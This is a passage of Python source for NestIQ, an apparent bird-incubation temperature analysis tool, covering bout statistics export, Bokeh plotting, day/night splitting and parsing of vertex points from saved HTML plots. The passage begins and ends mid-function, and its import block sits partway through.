(Full)" if gui.day_num_BV.get(): day_row += f"{i + 1}{partial}," if gui.date_BV.get(): day_row += f"{block.date}," if gui.off_count_BV.get(): day_row += f"{block.off_count}," if gui.off_dur_BV.get(): day_row += f"{block.mean_off_dur}," if gui.off_dur_sd_BV.get(): day_row += f"{block.off_dur_stdev}," if gui.off_dec_BV.get(): day_row += f"{block.mean_off_dec}," if gui.off_dec_sd_BV.get(): day_row += f"{block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): day_row += f"{block.mean_off_temper}," if gui.off_time_sum_BV.get(): day_row += f"{block.off_time_sum}," if gui.on_count_BV.get(): day_row += f"{block.on_count}," if gui.on_dur_BV.get(): day_row += f"{block.mean_on_dur}," if gui.on_dur_sd_BV.get(): day_row += f"{block.on_dur_stdev}," if gui.on_inc_BV.get(): day_row += f"{block.mean_on_inc}," if gui.on_inc_sd_BV.get(): day_row += f"{block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): day_row += f"{block.mean_on_temper}," if gui.on_time_sum_BV.get(): day_row += f"{block.on_time_sum}," if gui.time_above_temper_BV.get(): day_row += f"{block.time_above_temper}," if gui.time_below_temper_BV.get(): day_row += f"{block.time_below_temper}," if gui.bouts_dropped_BV.get(): day_row += f"{block.bouts_dropped}," if gui.mean_temper_d_BV.get(): day_row += f"{block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): day_row += f"{block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): day_row += f"{block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): day_row += f"{block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): day_row += f"{block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): day_row += f"{block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): day_row += f"{block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): day_row += f"{block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): day_row += 
f"{block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): day_row += f"{block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): day_row += f"{block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): day_row += f"{block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): day_row += f"{block.median_temper}," if gui.min_temper_dn_BV.get(): day_row += f"{block.min_egg_temper}," if gui.max_temper_dn_BV.get(): day_row += f"{block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): day_row += f"{block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): day_row += f"{block.air_temper_stdev}," if gui.min_air_temper_BV.get(): day_row += f"{block.min_air_temper}," if gui.max_air_temper_BV.get(): day_row += f"{block.max_air_temper}," day_rows.append(day_row) gui.multi_in_full_day_count += len(date_blocks) # ----------------------------------------------------------------------------------------------- # Output stats summary for entire input file summary_row = "" if gui.day_num_BV.get(): summary_row += f"--," if gui.date_BV.get(): summary_row += f"ALL DATA," if gui.off_count_BV.get(): summary_row += f"{master_block.off_count}," if gui.off_dur_BV.get(): summary_row += f"{master_block.mean_off_dur}," if gui.off_dur_sd_BV.get(): summary_row += f"{master_block.off_dur_stdev}," if gui.off_dec_BV.get(): summary_row += f"{master_block.mean_off_dec}," if gui.off_dec_sd_BV.get(): summary_row += f"{master_block.off_dec_stdev}," if gui.mean_off_temper_BV.get(): summary_row += f"{master_block.mean_off_temper}," if gui.off_time_sum_BV.get(): summary_row += f"{master_block.off_time_sum}," if gui.on_count_BV.get(): summary_row += f"{master_block.on_count}," if gui.on_dur_BV.get(): summary_row += f"{master_block.mean_on_dur}," if gui.on_dur_sd_BV.get(): summary_row += f"{master_block.on_dur_stdev}," if gui.on_inc_BV.get(): summary_row += f"{master_block.mean_on_inc}," if gui.on_inc_sd_BV.get(): summary_row += f"{master_block.on_inc_stdev}," if gui.mean_on_temper_BV.get(): summary_row += f"{master_block.mean_on_temper}," if gui.on_time_sum_BV.get(): summary_row += f"{master_block.on_time_sum}," if gui.time_above_temper_BV.get(): summary_row += f"{master_block.time_above_temper}," if gui.time_below_temper_BV.get(): summary_row += f"{master_block.time_below_temper}," if gui.bouts_dropped_BV.get(): summary_row += f"{master_block.bouts_dropped}," if gui.mean_temper_d_BV.get(): summary_row += f"{master_block.mean_egg_temper_day}," if gui.mean_temper_d_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_day}," if gui.median_temper_d_BV.get(): summary_row += f"{master_block.median_egg_temper_day}," if gui.min_temper_d_BV.get(): summary_row += f"{master_block.min_egg_temper_day}," if gui.max_temper_d_BV.get(): summary_row += f"{master_block.max_egg_temper_day}," if gui.mean_temper_n_BV.get(): summary_row += f"{master_block.mean_egg_temper_night}," if gui.mean_temper_n_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev_night}," if gui.median_temper_n_BV.get(): summary_row += f"{master_block.median_egg_temper_night}," if gui.min_temper_n_BV.get(): summary_row += f"{master_block.min_egg_temper_night}," if gui.max_temper_n_BV.get(): summary_row += f"{master_block.max_egg_temper_night}," if gui.mean_temper_dn_BV.get(): summary_row += f"{master_block.mean_egg_temper}," if gui.mean_temper_dn_sd_BV.get(): summary_row += f"{master_block.egg_temper_stdev}," if gui.median_temper_dn_BV.get(): summary_row += f"{master_block.median_temper}," if gui.min_temper_dn_BV.get(): summary_row += 
f"{master_block.min_egg_temper}," if gui.max_temper_dn_BV.get(): summary_row += f"{master_block.max_egg_temper}," if gui.air_valid: if gui.mean_air_temper_BV.get(): summary_row += f"{master_block.mean_air_temper}," if gui.mean_air_temper_sd_BV.get(): summary_row += f"{master_block.air_temper_stdev}," if gui.min_air_temper_BV.get(): summary_row += f"{master_block.min_air_temper}," if gui.max_air_temper_BV.get(): summary_row += f"{master_block.max_air_temper}," summary_row += "\n\n" # Determine what files to write day statistics to out_paths = [] if gui.get_stats_BV.get(): out_paths.append(Path(gui.stats_file_E.get())) if gui.multi_in_stats_BV.get(): out_paths.append(Path(gui.multi_in_stats_file_E.get())) # Write day statistics for path in out_paths: with open(path, "a") as out_file: print(header, end="\n", file=out_file) print("\n".join(day_rows), end="\n", file=out_file) print(summary_row, end="\n", file=out_file) if not gui.get_stats_BV.get(): return # ----------------------------------------------------------------------------------------------- # Report information on individual bouts indi_header = "Individual Bout Stats\n" indi_header += ( "Date,Bout Type,Start Time,End Time,Start Data Point,End Data Point,Duration (min),Egg Temp Change,Start Egg Temp,End Egg Temp,Mean Egg Temp, Egg Temp StDev," ) if gui.air_valid: indi_header += "Start Air Temp, End Air Temp, Mean Air Temp, Air Temp StDev" bouts = master_block.bouts bout_rows = [] cur_date = "" for bout in bouts: row = "" # Print date if it is the first row corresponding to this date this_date = gui.master_df.loc[bout.first, "date_time"].strftime(r"%m/%d/%Y") row += "," if this_date == cur_date else f"{this_date}," cur_date = this_date row += f"{bout.bout_type}," row += ( f"{gui.master_df.loc[bout.first, "date_time"].strftime(r"%H:%M")}," + f"{gui.master_df.loc[bout.last, "date_time"].strftime(r"%H:%M")}," + f"{gui.master_df.loc[bout.first, "data_point"]}," + f"{gui.master_df.loc[bout.last, "data_point"]}," + f"{bout.dur}," + f"{bout.temper_change}," + f"{gui.master_df.loc[bout.first, "egg_temper"]}," + f"{gui.master_df.loc[bout.last, "egg_temper"]}," + f"{bout.mean_egg_temper}," + f"{bout.egg_temper_stdev}," ) if gui.air_valid: row += ( f"{gui.master_df.loc[bout.first, "air_temper"]}," + f"{gui.master_df.loc[bout.last, "air_temper"]}," + f"{bout.mean_air_temper}," + f"{bout.air_temper_stdev}" ) bout_rows.append(row) with open(Path(gui.stats_file_E.get()), "a") as out_file: print(indi_header, end="\n", file=out_file) print("\n".join(bout_rows), file=out_file) def generate_plot(gui, days_list, edit_mode=False, out_path=None): """ Uses the Bokeh module to generate an interactive plot for the current input file. Args: gui (GUIClass): days_list (list): used to place vertical day delimiting line edit_mode (bool): generates a modified plot that allows for vertex manipulation """ def get_plot_dims(): """ Determine plot dimientions based on either user provided values or monitor dimension detection. 
""" if not gui.manual_plot_dims.get(): try: mon_dims = (gui.root.winfo_screenwidth(), gui.root.winfo_screenheight()) mon_x = mon_dims[0] mon_y = mon_dims[1] plot_width = int(mon_x) - 100 plot_height = int(mon_y) - 200 except: print("Defaulting to manual plot dimensions") plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) else: plot_width = int(gui.plot_dim_x_E.get()) plot_height = int(gui.plot_dim_y_E.get()) return plot_width, plot_height def get_plot_axes(): """ Determine proper constrains of y axis """ y_min = float("inf") y_max = float("-inf") if gui.plot_egg_BV.get(): y_min = min(y_min, df["egg_temper"].min()) y_max = max(y_max, df["egg_temper"].max()) if gui.plot_air_BV.get() and gui.air_valid: y_min = min(y_min, df["air_temper"].min()) y_max = max(y_max, df["air_temper"].max()) if gui.plot_adj_BV.get(): y_min = min(y_min, df["smoothed_adj_temper"].min()) y_max = max(y_max, df["smoothed_adj_temper"].max()) y_min -= 2 y_max += 2 return y_min, y_max def generate_table(): """ Generate table with vertex information """ table_title = "Egg Temperature" verts = get_verts_from_master_df(df) x_list, y_list = [], [] # Add vertices to table (allow egg_tempers or adj_tempers, not both) if gui.plot_egg_BV.get(): x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "egg_temper"] for vert in verts] elif gui.plot_adj_BV.get(): table_title = "Adjusted Temperature" x_list += [df.loc[vert.index, "data_point"] for vert in verts] y_list += [df.loc[vert.index, "smoothed_adj_temper"] for vert in verts] data = {"x": x_list, "y": y_list} src = ColumnDataSource(data) columns = [TableColumn(field="x", title="Transition Data Point"), TableColumn(field="y", title=table_title)] # FLAG shoud make height dynamic data_table = DataTable(source=src, columns=columns, width=500, height=100000) return data_table def append_input_info(path): # Get number of seconds between each data point first = df["date_time"].iloc[0] last = df["date_time"].iloc[-1] delta_sec = (last - first).total_seconds() interval = round(delta_sec / len(df)) # Create dictionary summarizing critical input file information input_dict = { "first_dp": int(df["data_point"].iloc[0]), "first_dt": df["date_time"].iloc[0].strftime(r"%m/%d/%Y %H:%M:%S"), "dt_interval": interval, "egg_temper": df["egg_temper"].tolist(), "air_temper": df["air_temper"].tolist() } # Append input file information to the HTML file with open(path, "a") as file: file.write("\n\n<!--NestIQ input data\n") file.write(json.dumps(input_dict)) file.write("\n-->\n") df = gui.master_df master_array = df_to_array(df) # Clears previous plots from memory reset_output() # Set output file out_path = out_path if out_path is not None else Path(gui.plot_file_E.get()) output_file(out_path) plot_width, plot_height = get_plot_dims() TOOLTIPS = [("Data Point", "$x{int}"), ("Temperature", "$y")] hover = HoverTool(tooltips=TOOLTIPS) # Set plot title plot_name = Path(gui.input_file_E.get()).stem if gui.plot_title_E.get() != "": plot_name = gui.plot_title_E.get() # Set plot axes y_min, y_max = get_plot_axes() dp_col_num = df.columns.get_loc("data_point") # Create core plot plot = figure( tools=[hover, "box_select, box_zoom, wheel_zoom, pan, reset, save"], x_range=[df.iloc[0, dp_col_num], df.iloc[-1, dp_col_num]], y_range=[y_min, y_max], title=plot_name, x_axis_label="Data Point", y_axis_label="Temperature (C)", plot_width=plot_width, plot_height=plot_height, ) # Add vertical lines delimiting days if gui.show_day_markers_BV.get(): for day 
    # Get array of adjusted (egg - air) temperatures and smooth if requested
    if gui.plot_adj_BV.get():
        adj_array = df["smoothed_adj_temper"]

        # Plot line
        if float(gui.bout_line_width_E.get()) > 0:
            plot.line(df["data_point"], adj_array, line_width=float(gui.bout_line_width_E.get()), color=gui.bout_line_color.get())

        # Plot adjusted temperatures as triangles if egg temperatures are also being plotted
        plot_shape = plot.triangle if gui.plot_egg_BV.get() else plot.circle

        # Add legend values (single dummy glyphs at the first data point,
        # mirroring the egg-temperature branch above)
        if edit_mode:
            plot.circle(df.loc[0, "data_point"], adj_array[0], size=float(gui.on_point_size_E.get()), color="gray", legend="Temperature reading")
        else:
            plot_shape(
                df.loc[0, "data_point"],
                adj_array[0],
                size=float(gui.on_point_size_E.get()),
                color=gui.on_point_color.get(),
                legend="On-bout (egg - air)",
            )
            plot_shape(
                df.loc[0, "data_point"],
                adj_array[0],
                size=float(gui.on_point_size_E.get()),
                color=gui.off_point_color.get(),
                legend="Off-bout (egg - air)",
            )

        # Add data points
        plot_shape(df["data_point"], adj_array, size=float(gui.on_point_size_E.get()), color=color_, alpha=alpha_)

    data_table = generate_table()

    if edit_mode:
        # Plot vertices as large circles in select mode
        renderer = plot.circle(
            "x",
            "y",
            size=float(gui.on_point_size_E.get()),
            color="red",
            fill_alpha=0.8,
            legend="Incubation State Change",
            source=data_table.source,
        )
        draw_tool = PointDrawTool(renderers=[renderer], empty_value=1)
        plot.add_tools(draw_tool)
        plot.toolbar.active_drag = draw_tool

    # Get formatting settings from GUI
    plot.title.text_font_size = gui.title_font_size_E.get() + "pt"
    plot.axis.axis_label_text_font_size = gui.axis_title_font_size_E.get() + "pt"
    plot.axis.major_label_text_font_size = gui.axis_label_font_size_E.get() + "pt"
    plot.axis.major_tick_line_width = int(gui.axis_tick_size_E.get())
    plot.axis.minor_tick_line_width = int(gui.axis_tick_size_E.get())
    plot.axis.major_tick_out = int(gui.axis_tick_size_E.get())
    plot.axis.minor_tick_out = int(gui.axis_tick_size_E.get())
    plot.legend.label_text_font_size = gui.legend_font_size_E.get() + "pt"
    plot.legend.click_policy = "hide"
    plot.legend.location = gui.legend_loc.get()
    plot.background_fill_color = None
    plot.border_fill_color = None

    show(column(plot, widgetbox(data_table)))

    append_input_info(out_path)
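# append_input_info stores the input series inside an HTML comment at the end
# of the saved plot, which lets a later session recover the data without the
# original input file. A minimal sketch of the matching reader (hypothetical
# helper, assuming the "<!--NestIQ input data ... -->" block written above):

def _read_input_info(html_path):
    """Extract the JSON dict appended by append_input_info, or None if absent."""
    content = Path(html_path).read_text()
    match = re.search(r"<!--NestIQ input data\n(.*?)\n-->", content, re.DOTALL)
    return json.loads(match.group(1)) if match else None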
def get_verts_from_master_df(master_df):
    """
    Extracts vertex objects based on state transitions in master_df.

    Args:
        master_df (pd.DataFrame)
    """

    if "bout_state" not in master_df.columns:
        return []

    # Convert bout_states to integers
    temp_df = master_df.copy()
    int_states = temp_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2])

    # Create Boolean Series that stores if the state has changed
    state_changed = int_states.diff().astype(bool)
    state_changed.iloc[0] = False

    # Extract indices of rows where the state changes
    vert_indices = master_df[state_changed].index.tolist()

    vertices = []
    for index in vert_indices:
        row = master_df.loc[index]
        vertices.append(niq_classes.Vertex(index, row["egg_temper"], row["bout_state"]))

    # Add vertices at beginning and end of data set
    last = len(master_df) - 1
    vertices.append(niq_classes.Vertex(0, master_df.loc[0, "egg_temper"], master_df.loc[0, "bout_state"]))
    vertices.append(niq_classes.Vertex(last, master_df.loc[last, "egg_temper"], master_df.loc[last, "bout_state"]))

    vertices.sort(key=lambda x: x.index)

    return vertices


def replace_entry(entry, new_value):
    """Replace the contents of a tkinter entry box with new_value."""
    entry.delete(0, "end")
    entry.insert(0, new_value)


def filter_by_dur(gui):
    """
    Purges the master df of state clusters failing to meet a given duration threshold.

    Args:
        gui (GUI)
    """

    dur_thresh = int(gui.dur_thresh_E.get())

    df = gui.master_df
    bouts_dropped_locs = set()
    # Iterate over a copy: the original looped over the very list it was mutating
    for bout in list(gui.master_block.bouts):
        dur = bout.last - bout.first
        # If duration threshold not met
        if dur < dur_thresh:
            # Set bout_state for corresponding rows to that of adjacent row
            new_state = "on" if bout.bout_type == "off" else "off"
            df.loc[bout.first:bout.last, "bout_state"] = new_state
            bouts_dropped_locs.add(bout.middle)
            # Delete bout
            gui.master_block.bouts.remove(bout)

    return df, bouts_dropped_locs


def set_unique_path(entry, path, ext):
    """
    Increments an identification number until a unique file name is found, then fills
    the entry box with the unique path.

    Args:
        entry (tk.Entry): entry box being updated
        path (pathlib.Path): path to check for uniqueness
        ext (str): file extension
    """

    counter = 0
    ori_stem = path.stem
    file_path = Path(path).with_suffix(ext)

    # Add trailing number until unique path is found
    while file_path.exists():
        counter += 1
        file_path = (file_path.parent / (ori_stem + "_" + str(counter).zfill(3))).with_suffix(ext)

    replace_entry(entry, file_path)


def remove_curly(*entries, string=False):
    """
    Removes curly braces from entry box contents. These are often added for paths containing spaces.

    Args:
        entries (tk.Entry)
    """

    if string:
        return entries[0].lstrip("{").rstrip("}")

    for entry in entries:
        replace_entry(entry, entry.get().lstrip("{").rstrip("}"))
def df_to_array(df):
    """
    Convert master DataFrame to a numpy array.

    Columns:
        0 - data point
        1 - delta temper (emission): change in smoothed_egg_temper or
            smoothed_adj_temper depending on user setting
        2 - bout state
    """

    # If an array is passed, just return it
    if isinstance(df, np.ndarray):
        return df

    # Grab appropriate columns
    if "bout_state" in df.columns:
        mod_df = df.loc[:, ["data_point", "delta_temper", "bout_state"]].copy()
        # Convert bout states to integers
        mod_df.loc[:, "bout_state"].replace(["off", "on", "None"], [0, 1, 2], inplace=True)
    else:
        mod_df = df[["data_point", "delta_temper"]]

    return mod_df.to_numpy()


def get_bouts_from_verts(gui, verts):
    """
    Extracts bout objects based on vertex locations.

    Args:
        gui (GUIClass)
        verts (list): vertices delimiting incubation state changes
    """

    bouts = []

    # Return if insufficient number of vertices supplied
    if verts is None or len(verts) < 2:
        return bouts

    # Create bout objects
    cur_vert = verts[0]
    for next_vert in verts[1:]:
        # Skip if cur_vert is start of nighttime period
        if cur_vert.vert_type != "None" and next_vert.index > cur_vert.index:
            bouts.append(niq_classes.Bout(gui, cur_vert.index, next_vert.index - 1, cur_vert.vert_type))
        cur_vert = next_vert

    bouts.sort(key=lambda x: x.first)

    return bouts


def is_number(string):
    """Return True if string can be parsed as a float."""
    try:
        float(string)
    except ValueError:
        return False
    return True
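# df_to_array strips the labeled DataFrame down to the plain numeric matrix
# used by downstream numeric code. A toy round trip (toy values only), noting
# that mixed integer/float columns come back as a float64 array:

_toy = pd.DataFrame({
    "data_point": [1, 2, 3],
    "delta_temper": [0.0, 0.4, -0.2],
    "bout_state": ["off", "on", "None"],
})
_arr = df_to_array(_toy)
assert _arr.shape == (3, 3)
assert _arr[:, 2].tolist() == [0, 1, 2]   # bout states coded off=0, on=1, None=2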
import datetime import json import re import time from pathlib import Path import numpy as np import pandas as pd from bokeh.io import reset_output from bokeh.layouts import column, widgetbox from bokeh.models import HoverTool, PointDrawTool, Span from bokeh.models.widgets import DataTable, TableColumn from bokeh.plotting import ColumnDataSource, figure, output_file, show from bs4 import BeautifulSoup from contextlib import suppress from tkinter import messagebox import niq_classes def convert_to_datetime(dt_string): """ Converts Date/Time cell from master DataFrame to datetime.datetime object. Args: dt_string (str): contents of date/time cell of input file provided by user """ # Return input if already datetime object if type(dt_string) == pd._libs.tslibs.timestamps.Timestamp: return dt_string # Try extracting date/time with various formats while True: with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M:%S") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M:%S") break with suppress(ValueError): time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M") break dt = datetime.datetime(*time_struct[0:6]) return dt def is_partial(df, first_index, last_index, expected_dur): """ Checks if given range of indices represents a complete daytime or nighttime period. Args: df (pd.DataFrame) first_index (int) last_index (int): expected_dur (int): expected duration in seconds """ # Allow 5 min (300 sec) of discrepency from expected durration block_dur_thresh = expected_dur - 300 start_time = df.loc[first_index, "date_time"] end_time = df.loc[last_index, "date_time"] block_dur = end_time - start_time if block_dur > datetime.timedelta(seconds=block_dur_thresh): return False return True def split_days(gui): """ Analyze dates of master DataFrame and parse row data into daytime and nighttime block objects. """ def is_daytime(date_time): """ Check if a given time falls within the daytime period defined by the user. Args: date_time (datetime.datetime) """ time = date_time.time() # When the start of daytime is earlier in the day than the start of nighttime if day_start < night_start: if time >= day_start and time < night_start: return True # When the start of nighttime is earlier in the day than the start of daytime elif night_start < day_start: if not (time >= night_start and time < day_start): return True return False def get_durs(day_start, night_start): """ Get expected durations in seconds for complete daytime and nightime periods. 
Args: day_start (datetime.time): user-defined start of daytime night_start (datetime.time) user-defined start of nighttime """ # Convert start times to datetime objects d = datetime.datetime(2020, 1, 1, day_start.hour, day_start.minute, day_start.second) n = datetime.datetime(2020, 1, 1, night_start.hour, night_start.minute, night_start.second) # When the start of daytime is earlier in the day than the start of nighttime if day_start < night_start: day_dur = (n - d).total_seconds() night_dur = 86400 - day_dur # Total seconds in day - daytime duration # When the start of nighttime is earlier in the day than the start of daytime elif night_start < day_start: night_dur = (d - n).total_seconds() day_dur = 86400 - day_dur # Total seconds in day - nighttime duration return day_dur, night_dur # Create time objects from entry box values day_start = convert_to_datetime(f"01/01/2020 {str(gui.day_start_E.get())}").time() night_start = convert_to_datetime(f"01/01/2020 {str(gui.night_start_E.get())}").time() # Get daytime and nighttime durations day_dur, night_dur = get_durs(day_start, night_start) # Create copy of master DataFrame to be appended to temp_df = gui.master_df.copy() temp_df["is_daytime"] = temp_df["date_time"].apply(is_daytime) # Detect day/night or night/day transitions int_states = temp_df.loc[:, "is_daytime"].replace([True, False], [1, 0]) state_changed = int_states.diff().apply(abs).astype(bool) state_changed.iloc[0] = False temp_df["transition_point"] = state_changed # Collect indices of day/night transition points filt = temp_df["transition_point"] == True transition_indices = temp_df[filt].index.to_list() transition_indices.append(len(temp_df)) # Construct day and night blocks from transition points days_list, nights_list = [], [] if is_daytime(temp_df.loc[0, "date_time"]): block_list = days_list block_dur_thresh = day_dur else: block_list = nights_list block_dur_thresh = night_dur cur_index = 0 for next_index in transition_indices: partial = is_partial(temp_df, cur_index, next_index - 1, block_dur_thresh) block_list.append(niq_classes.Block(gui, cur_index, (next_index - 1), partial)) block_dur_thresh = day_dur if block_dur_thresh == night_dur else night_dur block_list = days_list if block_list == nights_list else nights_list cur_index = next_index return days_list, nights_list def get_day_dur(day_start, night_start): """ Finds the duration of the daytime period specified by the user. Args: day_start (str): start of daytime period night_start (str): end of daytime period """ day = re.search(r"(\d+)(:)(\d+)", day_start) day_float = float(day.group(1)) + (float(day.group(3)) / 60) night = re.search(r"(\d+)(:)(\d+)", night_start) night_float = float(night.group(1)) + (float(night.group(3)) / 60) return (night_float - day_float) * 60 def smooth_series(radius, col): """ Generates "smoothed" copy of input data by applying a rolling mean of the requested radius. Args: radius (int): number of values to include in rolling mean (e.g. radius = 1 means average values i, i-1 and i+1) col (pd.Series): column data to be smoothed """ # Return original column if radius is less than 1 if radius <= 0: return col window = (radius * 2) + 1 return col.rolling(window, min_periods=1, center=True).mean() def get_verts_from_html(gui, in_file, alt=False): """ Creates vertex objects from vertices placed by the user in the provided HTML file. 
Args: gui (GUIClass) in_file (str): path to and name of HTML file containing user-provided vertex locations alt (Bool): dictates if vertices are extracted from the table or alternative variable in HTML file """ def get_data_points_from_html(gui, in_file): """ Extracts the corresponding data point for each point placed by the user in the HTML file. Args: gui (GUIClass) in_file (str): path to and name of HTML file containing user-provided vertex locations """ data_point_list = [] dp_col_num = gui.master_df.columns.get_loc("data_point") max_dp = gui.master_df.iloc[-1, dp_col_num] min_dp = gui.master_df.iloc[0, dp_col_num] with open(in_file, "r") as vertex_file: content = vertex_file.read() # Extract list of vertex data points try: # Try using Beautiful soup method soup = BeautifulSoup(content, "html.parser") # Extract html behind table table_widget = "bk-widget-box bk-layout-fixed" table_content = soup.find("div", class_=table_widget) # Extract leftmost column of data (data points) hits = table_content.find_all("div", class_="slick-cell l1 r1") dp_list = [hit.find("span", style="text-align: left;").text for hit in hits] # Get selected vertex if exists cell_re = re.compile(r"slick-cell l1 r1 selected\"><span style=\"text-align: left;\">(\d+)") selected = re.search(cell_re, content) if selected is not None: dp_list.append(selected.group(1)) except AttributeError: # Fall back to regex method try: dp_list = re.search(r'"data"\:\{"x":\[([^\]]*)', content).group(1).split(",") except AttributeError: dp_list = [] dp_list = [dp for dp in dp_list if is_number(dp)] for hit in dp_list: # Clean hits and append data_point = round(float(hit)) data_point = max(data_point, min_dp) data_point = min(data_point, max_dp) data_point_list.append(data_point) # Conversion to set removes redundant entries return sorted(set(data_point_list)) vertices = [] vertex_data_points = get_data_points_from_html(gui, in_file) # Make sure there is at least one data point detected in input plot if len(vertex_data_points) == 0: messagebox.showerror( "Input Plot Error", 'No vertices were detected in the provided plot.\n\n' + 'When saving plots, ensure the file type option is set to \"Webpage, Complete\" not \"Webpage, HTML only\".' ) return None # Flag -- make more pandas friendly for i in range(len(gui.master_df)): # Search for gap between index value and corresponding datapoint if int(gui.master_df.loc[i, "data_point"]) == int(vertex_data_points[0]): # Delta is discrepency between index and data point number delta = (vertex_data_points[0] - i) - 1 break # Search for gap between index value and corresponding datapoint filt = gui.master_df.loc[:, "data_point"] == vertex_data_points[0] first_dp_index = gui.master_df.loc[filt].index delta = int(gui.master_df.loc[first_dp_index, "data_point"] - first_dp_index) # Determine if first vertex is an off start or on start first_vert_temper = gui.master_df.loc[vertex_data_points[0] - delta, "egg_temper"] second_vert_temper = gui.master_df.loc[vertex_data_points[1] - delta, "egg_temper"] vert_type = "off" if first_vert_temper > second_vert_temper else "on" # Generate vertices for data_point in vertex_data_points: index = data_point - delta vertices.append(niq_classes.Vertex(index, gui.master_df.loc[index, "egg_temper"], vert_type)) vert_type = "on" if vert_type == "off" else "off" return vertices def extract_bouts_in_range(gui, total_bouts, first_index, last_index): """ Extracts vertices falling into a specified window of index values. 
Args: gui (GUIClass) total_bouts (list): every bout identified for the current input file first_index (int) last_index (int) """ bouts_in_range = [] left_limit, right_limit = 0, 0 if len(total_bouts) < 1 or last_index < total_bouts[0].first or first_index > total_bouts[-1].last: return bouts_in_range # Determine first bout in range for i in range(len(total_bouts)): if total_bouts[i].middle >= first_index: left_limit = i break # Determine last bout in range for i in range((len(total_bouts) - 1), -1, -1): if total_bouts[i].middle <= last_index: right_limit = i break bouts_in_range = total_bouts[left_limit : (right_limit + 1)] bouts_in_range.sort(key=lambda x: x.first) return bouts_in_range def get_date_blocks(gui): """ Creates Block objects for each date represented in the input file provided. Args: gui (GUIClass) """ # Get unique dates date_blocks = [] dates = gui.master_df["date_time"].apply(datetime.datetime.date).unique() # Get data points corrisponding to each date for date in dates: sub_df = gui.master_df[gui.master_df["date_time"].apply(datetime.datetime.date) == date] # 86400 = number of seconds in 24 hr partial = is_partial(gui.master_df, sub_df.index.min(), sub_df.index.max(), 86400) # Create Block object date_blocks.append(niq_classes.Block(gui, sub_df.index.min(), sub_df.index.max(), partial)) return date_blocks def write_stats(gui, date_blocks, master_block): """ Calculates and gathers several statistics and subsequently dumps them into the individual statistics file and/or the multi-input file statistics file depending on the user's requested output. Args: gui (GUIClass) days (BlockGroup): contains every day object and information about the group as a whole nights (BlockGroup): contains every night object and information about the group as a whole date_blocks (BlockGroup): contains every date Block which cary informationa bout data for each date master_block (block): block built from the entire input file """ if gui.get_stats_BV.get(): out_file = gui.stats_file_E.get() elif gui.multi_in_stats_BV.get(): out_file = gui.multi_in_stats_file_E.get() if not (gui.get_stats_BV.get() or gui.multi_in_stats_BV.get()): return # Used to indictate scope of certain statistics qualifier = " (D)," if gui.restrict_search_BV.get() else " (DN)," # Print input file name on top (remove directories) header = f"{gui.active_input_path.name}\n" if gui.day_num_BV.get(): header += "Day Number," if gui.date_BV.get(): header += "Date," if gui.off_count_BV.get(): header += "Off-bout Count" + qualifier if gui.off_dur_BV.get(): header += "Mean Off Duration" + qualifier if gui.off_dur_sd_BV.get(): header += "Off Dur StDev" + qualifier if gui.off_dec_BV.get(): header += "Mean Off Temp Drop" + qualifier if gui.off_dec_sd_BV.get(): header += "Off Drop StDev" + qualifier if gui.mean_off_temper_BV.get(): header += "Mean Off-Bout Temp" + qualifier if gui.off_time_sum_BV.get(): header += "Off-Bout Time Sum" + qualifier if gui.on_count_BV.get(): header += "On-bout Count" + qualifier if gui.on_dur_BV.get(): header += "Mean On Duration" + qualifier if gui.on_dur_sd_BV.get(): header += "On Dur StDev" + qualifier if gui.on_inc_BV.get(): header += "Mean On Temp Rise" + qualifier if gui.on_inc_sd_BV.get(): header += "On Rise StDev" + qualifier if gui.mean_on_temper_BV.get(): header += "Mean On-Bout Temp" + qualifier if gui.on_time_sum_BV.get(): header += "On-Bout Time Sum" + qualifier if gui.time_above_temper_BV.get(): header += "Time above " + gui.time_above_temper_E.get() + " (minutes)," if gui.time_below_temper_BV.get(): 
header += "Time below " + gui.time_below_temper_E.get() + " (minutes)," if gui.bouts_dropped_BV.get(): header += "Vertices Dropped" + qualifier if gui.mean_temper_d_BV.get(): header += "Mean Daytime Egg Temp," if gui.mean_temper_d_sd_BV.get(): header += "Day Egg Temp StDev," if gui.median_temper_d_BV.get(): header += "Median Daytime Egg Temp," if gui.min_temper_d_BV.get(): header += "Min Daytime Egg Temp," if gui.max_temper_d_BV.get(): header += "Max Daytime Egg Temp," if gui.mean_temper_n_BV.get(): header += "Mean Nighttime Egg Temp," if gui.mean_temper_n_sd_BV.get(): header += "Night Egg Temp StDev," if gui.median_temper_n_BV.get(): header += "Median Nighttime Egg Temp," if gui.min_temper_n_BV.get(): header += "Min Nighttime Egg Temp," if gui.max_temper_n_BV.get(): header += "Max Nighttime Egg Temp," if gui.mean_temper_dn_BV.get(): header += "Mean Egg Temp (DN)," if gui.mean_temper_dn_sd_BV.get(): header += "Egg Temp StDev (DN)," if gui.median_temper_dn_BV.get(): header += "Median Egg Temp (DN)," if gui.min_temper_dn_BV.get(): header += "Min Egg Temp (DN)," if gui.max_temper_dn_BV.get(): header += "Max Egg Temp (DN)," if gui.air_valid: if gui.mean_air_temper_BV.get(): header += "Mean Air Temp (DN)," if gui.mean_air_temper_sd_BV.get(): header += "Air Temp StDev (DN)," if 